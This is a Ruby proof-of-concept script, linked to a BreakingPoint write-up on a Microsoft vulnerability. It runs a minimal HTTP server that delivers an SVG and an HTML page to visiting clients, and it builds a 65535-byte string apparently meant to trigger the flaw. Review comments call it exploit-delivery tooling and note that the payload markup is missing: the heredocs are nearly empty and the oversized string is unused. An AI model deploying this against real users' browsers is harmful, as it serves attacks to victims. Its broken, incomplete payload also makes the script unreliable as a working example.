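#!/usr/bin/env ruby
# http://breakingpointsystems.com/community/blog/microsoft-vulnerability-proof-of-concept
# Nephi Johnson
#
# Tiny single-threaded HTTP server used to deliver a proof-of-concept page.
# Any request line matching /svg/ is answered with the `svg` document below,
# everything else with the `html` document, and a request containing "QUIT"
# stops the server.
#
# NOTE(review): this is exploit-delivery tooling. With no bind address it
# listens on every interface and any peer can terminate it with "QUIT", so run
# it only on an isolated lab network (or pass an address as the second
# argument: `poc.rb PORT [BIND_ADDR]`).

require 'socket'

# Write one HTTP/1.1 response -- status line, Date, Content-Length,
# Content-Type, blank line, then +data+ -- to +sock+.
#
# @param sock [#write] connected client socket
# @param data [String] response body
# @param opts [Hash] :code (default "200"), :message ("OK"),
#   :type ("text/html"), :desc ("content"; only used in the log line)
# @return [Boolean] true when the write succeeded, false on any StandardError
def http_send(sock, data, opts={})
  defaults = {:code=>"200", :message=>"OK", :type=>"text/html", :desc=>"content"}
  opts = defaults.merge(opts)
  date_str = Time.now.gmtime.strftime("%a, %d %b %Y %H:%M:%S GMT")
  # Content-Length is a byte count. String#length counts characters, which
  # under-reports for any non-ASCII body and desynchronises the client.
  headers = "HTTP/1.1 #{opts[:code]} #{opts[:message]}\r\n" \
            "Date: #{date_str}\r\n" \
            "Content-Length: #{data.bytesize}\r\n" \
            "Content-Type: #{opts[:type]}\r\n\r\n"
  puts "[+] Sending #{opts[:desc]}"
  sock.write(headers + data)
  true
rescue StandardError
  false
end

# Wait up to +timeout+ seconds for data on +sock+ and store up to 1024 bytes
# of it in +out_str+, which is replaced in place so the caller's string is
# updated.
#
# @param sock [BasicSocket] connected client socket
# @param out_str [String] receives the bytes read (mutated via #replace)
# @param timeout [Numeric] seconds to wait in select()
# @return [Boolean] true when data arrived; false on timeout (the socket is
#   closed), on EOF (empty read) or on any StandardError
def sock_read(sock, out_str, timeout=5)
  unless Kernel.select([sock], [], [], timeout)
    sock.close
    return false
  end
  chunk = sock.recv(1024).to_s
  out_str.replace(chunk)
  # An empty read means the peer hung up. The original fell into
  # `"..." + nil` here and relied on its rescue to return false; say so.
  return false if chunk.empty?
  puts "[+] Received:"
  puts "    " + chunk.split("\n").first.to_s
  true
rescue StandardError
  # StandardError only: the original `rescue Exception` also swallowed
  # Interrupt, so Ctrl-C while blocked in select() was silently ignored.
  false
end

port = ARGV[0] || 55555
# Optional bind address. nil keeps the original behaviour (all interfaces).
bind_addr = ARGV[1]

# Oversized attribute value intended for the SVG payload (65535 "!" bytes).
# NOTE(review): the heredoc below does not reference it -- the markup appears
# to have been lost when this listing was extracted. Restore the documents
# from the linked write-up before relying on this script.
transform_name = "\x21" * 65535

svg = <<-SVG
CLICK ME
SVG

html = <<-HTML
HTML

puts "[+] Listening on port #{port}"
puts

server_args = bind_addr ? [bind_addr, port] : [port]
TCPServer.open(*server_args) do |srv|
  loop do
    cli = srv.accept
    begin
      req = ""
      next unless sock_read(cli, req, 5)
      # Keep serving on this connection until the peer goes quiet, hangs up
      # or a write fails.
      until req.empty?
        if req =~ /GET.*svg/i
          break unless http_send(cli, svg, :type=>"image/svg+xml", :desc=>"svg")
        elsif req =~ /QUIT/
          # Remote kill switch: any peer that sends "QUIT" stops the server.
          exit
        else
          break unless http_send(cli, html, :type=>"text/html", :desc=>"html")
        end
        req = ""
        break unless sock_read(cli, req, 5)
      end
    ensure
      # The original only closed the client on the happy path, leaking the
      # descriptor when the first read failed; always release it.
      cli.close unless cli.closed?
    end
  end
end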